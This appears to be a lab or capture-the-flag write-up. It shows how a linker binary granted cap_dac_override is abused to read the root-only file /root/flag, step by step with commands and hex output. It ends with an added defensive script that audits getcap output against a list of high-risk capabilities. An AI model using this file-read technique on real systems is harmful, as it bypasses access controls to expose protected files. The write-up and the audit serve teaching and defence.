One of the files on the machine was granted a capability in the permitted capability set.
Objective: By leveraging the capability provided to the file, escalate to root and retrieve the flag!
Use getcap to find out which programs have a “special” capability. Programs with CAP_DAC_OVERRIDE can bypass file read, write, and execute permission checks.
student@localhost:~$ getcap -r / 2>/dev/null
/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep
Trying my luck to find out where the flag is stored.
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /tmp/flag
/usr/bin/x86_64-linux-gnu-ld.bfd: cannot find /tmp/flag: No such file or directory
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd /root/flag
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag: file format not recognized; treating as linker script
/usr/bin/x86_64-linux-gnu-ld.bfd:/root/flag:1: syntax error
How can the linker be used to read arbitrary files? Link them into a binary.
student@localhost:~$ /usr/bin/x86_64-linux-gnu-ld.bfd -r -b binary /root/flag -o flag.o
Then use xxd to see the flag in the built binary.
student@localhost:~$ xxd flag.o
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0100 3e00 0100 0000 0000 0000 0000 0000 ..>.............
00000020: 0000 0000 0000 0000 5001 0000 0000 0000 ........P.......
00000030: 0000 0000 4000 0000 0000 4000 0500 0400 ....@.....@.....
00000040: 3064 6233 3161 6562 3033 3936 6364 3839 0db31aeb0396cd89
00000050: 3664 6638 3732 6333 6132 3337 3039 3661 6df872c3a237096a
00000060: 0a00 0000 0000 0000 0000 0000 0000 0000 ................
...
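From the defender's side, the getcap step above doubles as an audit. The following added example (not part of the original write-up) filters `getcap -r` output down to files whose permitted set holds a capability that bypasses permission checks or leads to root. The RISKY list and every sample path except the ld.bfd line are assumptions of this example.

```shell
#!/bin/sh
# Added example: flag files whose permitted set holds a high-risk capability.
# RISKY is this example's own selection of capability names, not a complete list.
RISKY='cap_dac_override cap_dac_read_search cap_sys_admin cap_setuid cap_setgid cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# Reads `getcap -r` output on stdin, prints "path<TAB>capability" per finding.
audit_caps() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    {
        # Older libcap prints "path = caps+ep", newer prints "path caps=ep".
        cut = index($0, " = ")
        if (cut) { path = substr($0, 1, cut - 1); spec = substr($0, cut + 3) }
        else if (match($0, / [^ ]+$/)) { path = substr($0, 1, RSTART - 1); spec = substr($0, RSTART + 1) }
        else next
        # spec is "name[,name...]" then "+" or "=" then flag letters (e, i, p).
        op = match(spec, /[+=][eip]+$/)
        if (!op || index(substr(spec, op + 1), "p") == 0) next   # not in permitted set
        # An empty name list means the clause applies to every capability.
        if (op == 1) { printf "%s\tall\n", path; next }
        m = split(substr(spec, 1, op - 1), names, ",")
        for (j = 1; j <= m; j++)
            if (names[j] in bad) printf "%s\t%s\n", path, names[j]
    }'
}

# Constructed sample input: the first line is the one from this write-up, the
# others are made up to cover the newer output format and a low-risk capability.
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/x86_64-linux-gnu-ld.bfd = cap_dac_override+ep
/usr/bin/ping cap_net_raw=ep
/opt/tools/backup cap_dac_read_search,cap_net_bind_service=ep
/opt/tools/inherit-only cap_sys_admin=i
EOF
}

# On a live host: getcap -r / 2>/dev/null | audit_caps
sample_getcap_output | audit_caps
```

A capability that a flagged binary does not need can be removed with `setcap -r <file>`.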